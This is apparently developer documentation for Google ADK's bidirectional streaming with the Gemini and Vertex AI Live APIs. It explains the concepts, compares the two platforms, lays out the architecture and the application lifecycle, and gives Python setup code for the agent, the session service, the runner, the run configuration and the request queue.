**Demo Repository**: [adk-samples/python/agents/bidi-demo](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo) The demo features: - **WebSocket Communication**: Real-time bidirectional streaming with concurrent upstream/downstream tasks - **Multimodal Requests**: Text, audio, and image/video input with automatic transcription - **Flexible Responses**: Text or audio output based on model capabilities - **Interactive UI**: Web interface with event console for monitoring Live API events - **Google Search Integration**: Agent equipped with tool calling capabilities **We strongly recommend installing and running this demo** before diving into the guide. Hands-on experimentation will help you understand the concepts more deeply, and the demo code serves as a practical reference throughout all parts of this guide. For installation instructions and usage details, see the [demo README](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo). ## 1.1 What is Bidi-streaming? Bidi-streaming (Bidirectional streaming) represents a fundamental shift from traditional AI interactions. Instead of the rigid "ask-and-wait" pattern, it enables **real-time, two-way communication** where both human and AI can speak, listen, and respond simultaneously. This creates natural, human-like conversations with immediate responses and the revolutionary ability to interrupt ongoing interactions. Think of the difference between sending emails and having a phone conversation. Traditional AI interactions are like emails—you send a complete message, wait for a complete response, then send another complete message. Bidi-streaming is like a phone conversation—fluid, natural, with the ability to interrupt, clarify, and respond in real-time. 
### Key Characteristics

These characteristics distinguish Bidi-streaming from traditional AI interactions and make it uniquely powerful for creating engaging user experiences:

- **Two-way Communication**: Continuous data exchange without waiting for complete responses. Users can interrupt the AI mid-response with new input, creating a natural conversational flow. The AI responds after detecting the user has finished speaking (via automatic voice activity detection or explicit activity signals).
- **Responsive Interruption**: Perhaps the most important feature for the natural user experience: users can interrupt the agent mid-response with new input, just like in human conversation. If an AI is explaining quantum physics and you suddenly ask "wait, what's an electron?", the AI stops immediately and addresses your question.
- **Best for Multimodal**: Bidi-streaming excels at multimodal interactions because it can process different input types simultaneously through a single connection. Users can speak while showing documents, type follow-up questions during voice calls, or seamlessly switch between communication modes without losing context. This unified approach eliminates the complexity of managing separate channels for each modality.

```
sequenceDiagram
    participant Client as User
    participant Agent

    Client->>Agent: "Hi!"
    Client->>Agent: "Explain the history of Japan"
    Agent->>Client: "Hello!"
    Agent->>Client: "Sure! Japan's history is a..." (partial content)
    Client->>Agent: "Ah, wait."
    Agent->>Client: "OK, how can I help?" [interrupted: true]
```

### Difference from Other Streaming Types

Understanding how Bidi-streaming differs from other approaches is crucial for appreciating its unique value. The streaming landscape includes several distinct patterns, each serving different use cases:

[Figure: Streaming Types Comparison]

**Bidi-streaming** differs fundamentally from other streaming approaches:

- **Server-Side Streaming**: One-way data flow from server to client.
Like watching a live video stream: you receive continuous data but can't interact with it in real-time. Useful for dashboards or live feeds, but not for conversations.
- **Token-Level Streaming**: Sequential text token delivery without interruption. The AI generates its response word by word, but you must wait for completion before sending new input. Like watching someone type a message in real-time: you see it forming, but can't interrupt.
- **Bidi-streaming**: Full two-way communication with interruption support. True conversational AI where both parties can speak, listen, and respond simultaneously. This is what enables natural dialogue where you can interrupt, clarify, or change topics mid-conversation.

### Real-World Applications

Bidi-streaming revolutionizes agentic AI applications by enabling agents to operate with human-like responsiveness and intelligence. These applications showcase how streaming transforms static AI interactions into dynamic, agent-driven experiences that feel genuinely intelligent and proactive.

In a video of the [Shopper's Concierge demo](https://www.youtube.com/watch?v=LwHPYyw7u6U), the multimodal Bidi-streaming feature significantly improves the e-commerce user experience by enabling faster and more intuitive shopping. The combination of conversational understanding and rapid, parallelized searching culminates in advanced capabilities like virtual try-on, boosting buyer confidence and reducing the friction of online shopping.

There are many other possible real-world applications for Bidi-streaming:

#### Customer Service & Contact Centers

This is the most direct application. The technology can create sophisticated virtual agents that go far beyond traditional chatbots.

- Use Case: A customer calls a retail company's support line about a defective product.
- Multimodality (Video): The customer can say, "My coffee machine is leaking from the bottom, let me show you."
They can then use their phone's camera to stream live video of the issue. The AI agent can use its vision capabilities to identify the model and the specific point of failure. - Live Interaction & Interruption: If the agent says, "Okay, I'm processing a return for your Model X coffee maker," the customer can interrupt with, "No, wait, it's the Model Y Pro," and the agent can immediately correct its course without restarting the conversation. #### E-commerce & Personalized Shopping The agent can act as a live, interactive personal shopper, enhancing the online retail experience. - Use Case: A user is browsing a fashion website and wants styling advice. - Multimodality (Voice & Image): The user can hold up a piece of clothing to their webcam and ask, "Can you find me a pair of shoes that would go well with these pants?" The agent analyzes the color and style of the pants. - Live Interaction: The conversation can be a fluid back-and-forth: "Show me something more casual." ... "Okay, how about these sneakers?" ... "Perfect, add the blue ones in size 10 to my cart." #### Field Service & Technical Assistance Technicians working on-site can use a hands-free, voice-activated assistant to get real-time help. - Use Case: An HVAC technician is on-site trying to diagnose a complex commercial air conditioning unit. - Multimodality (Video & Voice): The technician, wearing smart glasses or using a phone, can stream their point-of-view to the AI agent. They can ask, "I'm hearing a strange noise from this compressor. Can you identify it and pull up the diagnostic flowchart for this model?" - Live Interaction: The agent can guide the technician step-by-step, and the technician can ask clarifying questions or interrupt at any point without taking their hands off their tools. #### Healthcare & Telemedicine The agent can serve as a first point of contact for patient intake, triage, and basic consultations. 
- Use Case: A patient uses a provider's app for a preliminary consultation about a skin condition.
- Multimodality (Video/Image): The patient can securely share a live video or high-resolution image of a rash. The AI can perform a preliminary analysis and ask clarifying questions.

#### Financial Services & Wealth Management

An agent can provide clients with a secure, interactive, and data-rich way to manage their finances.

- Use Case: A client wants to review their investment portfolio and discuss market trends.
- Multimodality (Screen Sharing): The agent can share its screen to display charts, graphs, and portfolio performance data. The client could also share their screen to point to a specific news article and ask, "What is the potential impact of this event on my tech stocks?"
- Live Interaction: The agent can analyze the client's current portfolio allocation by accessing their account data, then simulate the impact of a potential trade on the portfolio's risk profile.

## 1.2 Gemini Live API and Vertex AI Live API

ADK's Bidi-streaming capabilities are powered by Live API technology, available through two platforms: **[Gemini Live API](https://ai.google.dev/gemini-api/docs/live)** (via Google AI Studio) and **[Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)** (via Google Cloud). Both provide real-time, low-latency streaming conversations with Gemini models, but serve different development and deployment needs.

Throughout this guide, we use **"Live API"** to refer to both platforms collectively, specifying "Gemini Live API" or "Vertex AI Live API" only when discussing platform-specific features or differences.

### What is the Live API?

Live API is Google's real-time conversational AI technology that enables **low-latency Bidi-streaming** with Gemini models.
Unlike traditional request-response APIs, Live API establishes persistent WebSocket connections that support: **Core Capabilities:** - **Multimodal streaming**: Processes continuous streams of audio, video, and text in real-time - **Voice Activity Detection (VAD)**: Automatically detects when users finish speaking, enabling natural turn-taking without explicit signals. The AI knows when to start responding and when to wait for more input - **Immediate responses**: Delivers human-like spoken or text responses with minimal latency - **Intelligent interruption**: Enables users to interrupt the AI mid-response, just like human conversations - **Audio Transcription**: Real-time transcription of both user input and model output, enabling accessibility features and conversation logging without separate transcription services - **Session Management**: Long conversations can span multiple connections through session resumption, with the API preserving full conversation history and context across reconnections - **Tool Integration**: Function calling works seamlessly in streaming mode, with tools executing in the background while conversation continues **Native Audio Model Features:** - **Proactive Audio**: The model can initiate responses based on context awareness, creating more natural interactions where the AI offers help or clarification proactively (Native Audio models only) - **Affective Dialog**: Advanced models understand tone of voice and emotional context, adapting responses to match the conversational mood and user sentiment (Native Audio models only) Learn More For detailed information about Native Audio models and these features, see [Part 5: Audio and Video - Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog). 
**Technical Specifications:** - **Audio input**: 16-bit PCM at 16kHz (mono) - **Audio output**: 16-bit PCM at 24kHz (native audio models) - **Video input**: 1 frame per second, recommended 768x768 resolution - **Context windows**: Varies by model (typically 32k-128k tokens for Live API models). See [Gemini models](https://ai.google.dev/gemini-api/docs/models/gemini) for specific limits. - **Languages**: 24+ languages supported with automatic detection ### Gemini Live API vs Vertex AI Live API Both APIs provide the same core Live API technology, but differ in deployment platform, authentication, and enterprise features: | **Aspect** | **Gemini Live API** | **Vertex AI Live API** | | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Access** | Google AI Studio | Google Cloud | | **Authentication** | API key (`GOOGLE_API_KEY`) | Google Cloud credentials (`GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`) | | **Best for** | Rapid prototyping, development, experimentation | Production deployments, enterprise applications | | **Session Duration** | Audio-only: 15 min Audio+video: 2 min With [Part 4: Context Window Compression](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-context-window-compression): Unlimited | Both: 10 min With [Part 4: Context Window Compression](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-context-window-compression): Unlimited | | **Concurrent Sessions** | Tier-based quotas (see [API quotas](https://ai.google.dev/gemini-api/docs/quota)) | Up to 1,000 per project (configurable via quota requests) | | **Enterprise Features** | Basic | Advanced monitoring, logging, SLAs, 
session resumption (24h) | | **Setup Complexity** | Minimal (API key only) | Requires Google Cloud project setup | | **API Version** | `v1beta` | `v1beta1` | | **API Endpoint** | `generativelanguage.googleapis.com` | `{location}-aiplatform.googleapis.com` | | **Billing** | Usage tracked via API key | Google Cloud project billing | Live API Reference Notes **Concurrent session limits**: Quota-based and may vary by account tier or configuration. Check your current quotas in Google AI Studio or Google Cloud Console. **Official Documentation**: [Gemini Live API Guide](https://ai.google.dev/gemini-api/docs/live-guide) | [Vertex AI Live API Overview](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ## 1.3 ADK Bidi-streaming: For Building Realtime Agent Applications Building realtime Agent applications from scratch presents significant engineering challenges. While Live API provides the underlying streaming technology, integrating it into production applications requires solving complex problems: managing WebSocket connections and reconnection logic, orchestrating tool execution and response handling, persisting conversation state across sessions, coordinating concurrent data flows for multimodal inputs, and handling platform differences between development and production environments. ADK transforms these challenges into simple, declarative APIs. Instead of spending months building infrastructure for session management, tool orchestration, and state persistence, developers can focus on defining agent behavior and creating user experiences. This section explores what ADK handles automatically and why it's the recommended path for building production-ready streaming applications. **Raw Live API v. 
ADK Bidi-streaming:** | Feature | Raw Live API (`google-genai` SDK) | ADK Bidi-streaming (`adk-python` and `adk-java` SDK) | | ------------------------------------ | ------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Agent Framework** | ❌ Not available | ✅ Single agent, multi-agent with sub-agents, and sequential workflow agents, Tool ecosystem, Deployment ready, Evaluation, Security and more (see [ADK Agent docs](https://google.github.io/adk-docs/agents/)) | | **Tool Execution** | ❌ Manual tool execution and response handling | ✅ Automatic tool execution (see [Part 3: Tool Call Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#tool-call-events)) | | **Connection Management** | ❌ Manual reconnection and session resumption | ✅ Automatic reconnection and session resumption (see [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption)) | | **Event Model** | ❌ Custom event structures and serialization | ✅ Unified event model with metadata (see [Part 3: Event Handling](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)) | | **Async Event Processing Framework** | ❌ Manual async coordination and stream handling | ✅ `LiveRequestQueue`, `run_live()` async generator, automatic bidirectional flow coordination (see [Part 2](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) and [Part 3](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)) | | **App-level Session Persistence** | ❌ Manual implementation | ✅ SQL databases (PostgreSQL, MySQL, SQLite), Vertex AI, in-memory (see [ADK Session docs](https://google.github.io/adk-docs/sessions/)) | ### Platform Flexibility One of 
ADK's most powerful features is its transparent support for both [Gemini Live API](https://ai.google.dev/gemini-api/docs/live) and [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api). This platform flexibility enables a seamless development-to-production workflow: develop locally with Gemini API using free API keys, then deploy to production with Vertex AI using enterprise Google Cloud infrastructure—all **without changing application code**, only environment configuration. #### How Platform Selection Works ADK uses the `GOOGLE_GENAI_USE_VERTEXAI` environment variable to determine which Live API platform to use: - `GOOGLE_GENAI_USE_VERTEXAI=FALSE` (or not set): Uses Gemini Live API via Google AI Studio - `GOOGLE_GENAI_USE_VERTEXAI=TRUE`: Uses Vertex AI Live API via Google Cloud This environment variable is read by the underlying `google-genai` SDK when ADK creates the LLM connection. No code changes are needed when switching platforms—only environment configuration changes. 
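As a rough illustration of the selection rule above, the following sketch checks at startup which platform the environment would select and which credentials are still missing. The helper names `uses_vertex_ai` and `describe_platform` are hypothetical and not part of ADK or the `google-genai` SDK. The accepted truthy spellings (`true` and `1`, case-insensitive) are an assumption about how the flag is parsed, and the required variables are taken from the authentication row of the comparison table in section 1.2.

```python
import os


def uses_vertex_ai(env=None):
    """Return True when GOOGLE_GENAI_USE_VERTEXAI selects Vertex AI Live API."""
    env = os.environ if env is None else env
    flag = env.get("GOOGLE_GENAI_USE_VERTEXAI", "")
    # Assumption: "true" and "1" (case-insensitive) count as enabled;
    # anything else, including an unset variable, selects Gemini Live API.
    return flag.strip().lower() in {"true", "1"}


def describe_platform(env=None):
    """Return (platform name, list of required variables that are missing)."""
    env = os.environ if env is None else env
    if uses_vertex_ai(env):
        platform = "Vertex AI Live API"
        required = ("GOOGLE_CLOUD_PROJECT", "GOOGLE_CLOUD_LOCATION")
    else:
        platform = "Gemini Live API"
        required = ("GOOGLE_API_KEY",)
    missing = [name for name in required if not env.get(name)]
    return platform, missing


if __name__ == "__main__":
    platform, missing = describe_platform()
    print(f"Selected platform: {platform}")
    if missing:
        print("Missing settings:", ", ".join(missing))
```

A check like this could run before the application creates its `Runner`, so that a misconfigured environment fails early with a readable message rather than at connection time.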
##### Development Phase: Gemini Live API (Google AI Studio) ```bash # .env.development GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_API_KEY=your_api_key_here ``` **Benefits:** - Rapid prototyping with free API keys from Google AI Studio - No Google Cloud setup required - Instant experimentation with streaming features - Zero infrastructure costs during development ##### Production Phase: Vertex AI Live API (Google Cloud) ```bash # .env.production GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_CLOUD_PROJECT=your_project_id GOOGLE_CLOUD_LOCATION=us-central1 ``` **Benefits:** - Enterprise-grade infrastructure via Google Cloud - Advanced monitoring, logging, and cost controls - Integration with existing Google Cloud services - Production SLAs and support - **No code changes required** - just environment configuration By handling the complexity of session management, tool orchestration, state persistence, and platform differences, ADK lets you focus on building intelligent agent experiences rather than wrestling with streaming infrastructure. The same code works seamlessly across development and production environments, giving you the full power of Bidi-streaming without the implementation burden. ## 1.4 ADK Bidi-streaming Architecture Overview Now that you understand Live API technology and why ADK adds value, let's explore how ADK actually works. This section maps the complete data flow from your application through ADK's pipeline to Live API and back, showing which components handle which responsibilities. You'll see how key components like `LiveRequestQueue`, `Runner`, and `Agent` orchestrate streaming conversations without requiring you to manage WebSocket connections, coordinate async flows, or handle platform-specific API differences. ### High-Level Architecture ``` graph TB subgraph "Application" subgraph "Client" C1["Web / Mobile"] end subgraph "Transport Layer" T1["WebSocket / SSE (e.g. 
FastAPI)"]
    end
end

subgraph "ADK"
    subgraph "ADK Bidi-streaming"
        L1[LiveRequestQueue]
        L2[Runner]
        L3[Agent]
        L4[LLM Flow]
    end

    subgraph "LLM Integration"
        G1[GeminiLlmConnection]
        G2[Gemini Live API / Vertex AI Live API]
    end
end

C1 <--> T1
T1 -->|"live_request_queue.send()"| L1
L1 -->|"runner.run_live(queue)"| L2
L2 -->|"agent.run_live()"| L3
L3 -->|"_llm_flow.run_live()"| L4
L4 -->|"llm.connect()"| G1
G1 <--> G2
G1 -->|"yield LlmResponse"| L4
L4 -->|"yield Event"| L3
L3 -->|"yield Event"| L2
L2 -->|"yield Event"| T1

classDef external fill:#e1f5fe,stroke:#01579b,stroke-width:2px
classDef adk fill:#f3e5f5,stroke:#4a148c,stroke-width:2px

class C1,T1 external
class L1,L2,L3,L4,G1,G2 adk
```

| Developer provides: | ADK provides: | Live API provides: |
| --- | --- | --- |
| **Web / Mobile**: Frontend applications that users interact with, handling UI/UX, user input capture, and response display<br><br>**[WebSocket](https://developer.mozilla.org/en-US/docs/Web/API/WebSocket) / [SSE](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events) Server**: Real-time communication server (such as [FastAPI](https://fastapi.tiangolo.com/)) that manages client connections, handles streaming protocols, and routes messages between clients and ADK<br><br>**`Agent`**: Custom AI agent definition with specific instructions, tools, and behavior tailored to your application's needs | **[LiveRequestQueue](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/live_request_queue.py)**: Message queue that buffers and sequences incoming user messages (text content, audio blobs, control signals) for orderly processing by the agent<br><br>**[Runner](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py)**: Execution engine that orchestrates agent sessions, manages conversation state, and provides the `run_live()` streaming interface<br><br>**[RunConfig](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/run_config.py)**: Configuration for streaming behavior, modalities, and advanced features<br><br>**Internal components** (managed automatically, not directly used by developers): [LLM Flow](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/base_llm_flow.py) for processing pipeline and [GeminiLlmConnection](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/gemini_llm_connection.py) for protocol translation | **[Gemini Live API](https://ai.google.dev/gemini-api/docs/live)** (via Google AI Studio) and **[Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)** (via Google Cloud): Google's real-time language model services that process streaming input, generate responses, handle interruptions, support multimodal content (text, audio, video), and provide advanced AI capabilities like function calling and contextual understanding |

This architecture demonstrates ADK's clear separation of concerns: your
application handles user interaction and transport protocols, ADK manages the streaming orchestration and state, and the Live API provides the AI intelligence. By abstracting away the complexity of LLM-side streaming connection management, event loops, and protocol translation, ADK enables you to focus on building agent behavior and user experiences rather than streaming infrastructure.

## 1.5 ADK Bidi-streaming Application Lifecycle

ADK Bidi-streaming integrates the Live API session into the ADK framework's application lifecycle. This integration creates a four-phase lifecycle that combines ADK's agent management with the Live API's real-time streaming capabilities:

- **Phase 1: Application Initialization** (Once at Startup)
  - ADK Application initialization
    - Create an [Agent](https://google.github.io/adk-docs/agents/): for interacting with users, using external tools, and coordinating with other agents
    - Create a [SessionService](https://google.github.io/adk-docs/sessions/session/#managing-sessions-with-a-sessionservice): for getting or creating an ADK `Session`
    - Create a [Runner](https://google.github.io/adk-docs/runtime/): for providing a runtime for the `Agent`
- **Phase 2: Session Initialization** (Once per User Session)
  - ADK `Session` initialization:
    - Get or create an ADK `Session` using the `SessionService`
  - ADK Bidi-streaming initialization:
    - Create a [RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) for configuring ADK Bidi-streaming
    - Create a [LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) for sending user messages to the `Agent`
    - Start a [run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) event loop
- **Phase 3: Bidi-streaming with `run_live()` event loop** (One or More Times per User Session)
  - Upstream: The user sends messages to the agent with `LiveRequestQueue`
  - Downstream: The agent responds to the user with `Event` objects
- **Phase 4: Terminate Live API session** (One
or More Times per User Session)
  - `LiveRequestQueue.close()`

**Lifecycle Flow Overview:**

```
graph TD
    A[Phase 1: Application Init<br/>Once at Startup] --> B[Phase 2: Session Init<br/>Per User Connection]
    B --> C[Phase 3: Bidi-streaming<br/>Active Communication]
    C --> D[Phase 4: Terminate<br/>Close Session]
    D -.New Connection.-> B

    style A fill:#e3f2fd
    style B fill:#e8f5e9
    style C fill:#fff3e0
    style D fill:#ffebee
```

This flowchart shows the high-level lifecycle phases and how they connect. The detailed sequence diagram below illustrates the specific components and interactions within each phase.

```
sequenceDiagram
    participant Client
    participant App as Application Server
    participant Queue as LiveRequestQueue
    participant Runner
    participant Agent
    participant API as Live API

    rect rgb(230, 240, 255)
        Note over App: Phase 1: Application Initialization (Once at Startup)
        App->>Agent: 1. Create Agent(model, tools, instruction)
        App->>App: 2. Create SessionService()
        App->>Runner: 3. Create Runner(app_name, agent, session_service)
    end

    rect rgb(240, 255, 240)
        Note over Client,API: Phase 2: Session Initialization (Every Time a User Connects)
        Client->>App: 1. WebSocket connect(user_id, session_id)
        App->>App: 2. get_or_create_session(app_name, user_id, session_id)
        App->>App: 3. Create RunConfig(streaming_mode, modalities)
        App->>Queue: 4. Create LiveRequestQueue()
        App->>Runner: 5. Start run_live(user_id, session_id, queue, config)
        Runner->>API: Connect to Live API session
    end

    rect rgb(255, 250, 240)
        Note over Client,API: Phase 3: Bidi-streaming with run_live() Event Loop

        par Upstream: User sends messages via LiveRequestQueue
            Client->>App: User message (text/audio/video)
            App->>Queue: send_content() / send_realtime()
            Queue->>Runner: Buffered request
            Runner->>Agent: Process request
            Agent->>API: Stream to Live API
        and Downstream: Agent responds via Events
            API->>Agent: Streaming response
            Agent->>Runner: Process response
            Runner->>App: yield Event (text/audio/tool/turn)
            App->>Client: Forward Event via WebSocket
        end

        Note over Client,API: (Event loop continues until close signal)
    end

    rect rgb(255, 240, 240)
        Note over Client,API: Phase 4: Terminate Live API session
        Client->>App: WebSocket disconnect
        App->>Queue: close()
        Queue->>Runner: Close signal
        Runner->>API: Disconnect from Live API
        Runner->>App: run_live() exits
    end
```

The following sections detail each phase, showing exactly when to create each component and how the components work together. Understanding this lifecycle pattern is essential for building robust streaming applications that can handle multiple concurrent sessions efficiently.

### Phase 1: Application Initialization

These components are created once when your application starts and are shared across all streaming sessions. They define your agent's capabilities, manage conversation history, and orchestrate the streaming execution.

#### Define Your Agent

The `Agent` is the core of your streaming application: it defines what your AI can do, how it should behave, and which AI model powers it. You configure your agent with a specific model, tools it can use (like Google Search or custom APIs), and instructions that shape its personality and behavior.

Demo implementation: [agent.py:10-15](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/google_search_agent/agent.py#L10-L15) ```python """Google Search Agent definition for ADK Bidi-streaming demo.""" import os from google.adk.agents import Agent from google.adk.tools import google_search # Default models for Live API with native audio support: # - Gemini Live API: gemini-2.5-flash-native-audio-preview-12-2025 # - Vertex AI Live API: gemini-live-2.5-flash-native-audio agent = Agent( name="google_search_agent", model=os.getenv("DEMO_AGENT_MODEL", "gemini-2.5-flash-native-audio-preview-12-2025"), tools=[google_search], instruction="You are a helpful assistant that can search the web." ) ``` The agent instance is **stateless and reusable**—you create it once and use it for all streaming sessions. Agent configuration is covered in the [ADK Agent documentation](https://google.github.io/adk-docs/agents/). Model Availability For the latest supported models and their capabilities, see [Part 5: Understanding Audio Model Architectures](https://google.github.io/adk-docs/streaming/dev-guide/part5/#understanding-audio-model-architectures). Agent vs LlmAgent `Agent` is the recommended shorthand for `LlmAgent` (both are imported from `google.adk.agents`). They are identical - use whichever you prefer. This guide uses `Agent` for brevity, but you may see `LlmAgent` in other ADK documentation and examples. #### Define Your SessionService The ADK [Session](https://google.github.io/adk-docs/sessions/session/) manages conversation state and history across streaming sessions. It stores and retrieves session data, enabling features like conversation resumption and context persistence. To create a `Session`, or get an existing one for a specified `session_id`, every ADK application needs to have a [SessionService](https://google.github.io/adk-docs/sessions/session/#managing-sessions-with-a-sessionservice). 
For development purposes, ADK provides a simple `InMemorySessionService` that will lose the `Session` state when the application shuts down.

Demo implementation: [main.py:37](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L37)

```python
from google.adk.sessions import InMemorySessionService

# Define your session service
session_service = InMemorySessionService()
```

For production applications, choose a persistent session service based on your infrastructure:

**Use `DatabaseSessionService` if:**

- You need persistent storage with SQLite, PostgreSQL, or MySQL
- You're building single-server apps (SQLite) or multi-server deployments (PostgreSQL/MySQL)
- You want full control over data storage and backups
- Examples:
  - SQLite: `DatabaseSessionService(db_url="sqlite:///./sessions.db")`
  - PostgreSQL: `DatabaseSessionService(db_url="postgresql://user:pass@host/db")`

**Use `VertexAiSessionService` if:**

- You're already using Google Cloud Platform
- You want managed storage with built-in scalability
- You need tight integration with Vertex AI features
- Example: `VertexAiSessionService(project="my-project")`

Both provide session persistence; choose based on your infrastructure and scale requirements. With a persistent session service, the state of the `Session` is preserved even after the application shuts down. See the [ADK Session Management documentation](https://google.github.io/adk-docs/sessions/) for more details.

#### Define Your Runner

The [Runner](https://google.github.io/adk-docs/runtime/) provides the runtime for the `Agent`. It manages the conversation flow, coordinates tool execution, handles events, and integrates with session storage. You create one runner instance at application startup and reuse it for all streaming sessions.

Demo implementation: [main.py:50,53](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L50)

```python
from google.adk.runners import Runner

APP_NAME = "bidi-demo"

# Define your runner
runner = Runner(
    app_name=APP_NAME,
    agent=agent,
    session_service=session_service
)
```

The `app_name` parameter is required and identifies your application in session storage. All sessions for your application are organized under this name.

### Phase 2: Session Initialization

#### Get or Create Session

An ADK `Session` provides a "conversation thread" for the Bidi-streaming application. Just like you wouldn't start every text message from scratch, agents need context regarding the ongoing interaction. `Session` is the ADK object designed specifically to track and manage these individual conversation threads.

##### ADK `Session` vs Live API session

An ADK `Session` (managed by the `SessionService`) provides **persistent conversation storage** across multiple Bidi-streaming sessions and can span hours, days, or even months. A Live API session (managed by the Live API backend) is **a transient streaming context** that exists only during a single Bidi-streaming event loop (discussed later) and typically spans minutes or hours. When the loop starts, ADK initializes the Live API session with history from the ADK `Session`, then updates the ADK `Session` as new events occur.

**Learn More**: For a detailed comparison with sequence diagrams, see [Part 4: ADK `Session` vs Live API session](https://google.github.io/adk-docs/streaming/dev-guide/part4/#adk-session-vs-live-api-session).

##### Session Identifiers Are Application-Defined

Sessions are identified by three parameters: `app_name`, `user_id`, and `session_id`. This three-level hierarchy enables multi-tenant applications where each user can have multiple concurrent sessions.
Both `user_id` and `session_id` are **arbitrary string identifiers** that you define based on your application's needs. ADK performs no format validation beyond `.strip()` on `session_id`—you can use any string values that make sense for your application: - **`user_id` examples**: User UUIDs (`"550e8400-e29b-41d4-a716-446655440000"`), email addresses (`"alice@example.com"`), database IDs (`"user_12345"`), or simple identifiers (`"demo-user"`) - **`session_id` examples**: Custom session tokens, UUIDs, timestamp-based IDs (`"session_2025-01-27_143022"`), or simple identifiers (`"demo-session"`) **Auto-generation**: If you pass `session_id=None` or an empty string to `create_session()`, ADK automatically generates a UUID for you (e.g., `"550e8400-e29b-41d4-a716-446655440000"`). **Organizational hierarchy**: These identifiers organize sessions in a three-level structure: ```text app_name → user_id → session_id → Session ``` This design enables scenarios like: - Multi-tenant applications where different users have isolated conversation spaces - Single users with multiple concurrent chat threads (e.g., different topics) - Per-device or per-browser session isolation ##### Recommended Pattern: Get-or-Create The recommended production pattern is to check if a session exists first, then create it only if needed. 
This approach safely handles both new sessions and conversation resumption: Demo implementation: [main.py:155-161](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L155-L161) ```python # Get or create session (handles both new sessions and reconnections) session = await session_service.get_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) if not session: await session_service.create_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) ``` This pattern works correctly in all scenarios: - **New conversations**: If the session doesn't exist, it's created automatically - **Resuming conversations**: If the session already exists (e.g., reconnection after network interruption), the existing session is reused with full conversation history - **Idempotent**: Safe to call multiple times without errors **Important**: The session must exist before calling `runner.run_live()` with the same identifiers. If the session doesn't exist, `run_live()` will raise `ValueError: Session not found`. #### Create RunConfig [RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) defines the streaming behavior for this specific session—which modalities to use (text or audio), whether to enable transcription, voice activity detection, proactivity, and other advanced features. 
Demo implementation: [main.py:110-124](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L110-L124) ```python from google.adk.agents.run_config import RunConfig, StreamingMode from google.genai import types # Native audio models require AUDIO response modality with audio transcription response_modalities = ["AUDIO"] run_config = RunConfig( streaming_mode=StreamingMode.BIDI, response_modalities=response_modalities, input_audio_transcription=types.AudioTranscriptionConfig(), output_audio_transcription=types.AudioTranscriptionConfig(), session_resumption=types.SessionResumptionConfig() ) ``` `RunConfig` is **session-specific**—each streaming session can have different configuration. For example, one user might prefer text-only responses while another uses voice mode. See [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) for complete configuration options. #### Create LiveRequestQueue `LiveRequestQueue` is the communication channel for sending messages to the agent during streaming. It's a thread-safe async queue that buffers user messages (text content, audio blobs, activity signals) for orderly processing. Demo implementation: [main.py:163](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L163) ```python from google.adk.agents.live_request_queue import LiveRequestQueue live_request_queue = LiveRequestQueue() ``` `LiveRequestQueue` is **session-specific and stateful**—you create a new queue for each streaming session and close it when the session ends. Unlike `Agent` and `Runner`, queues cannot be reused across sessions. One Queue Per Session Never reuse a `LiveRequestQueue` across multiple streaming sessions. Each call to `run_live()` requires a fresh queue. Reusing queues can cause message ordering issues and state corruption. 
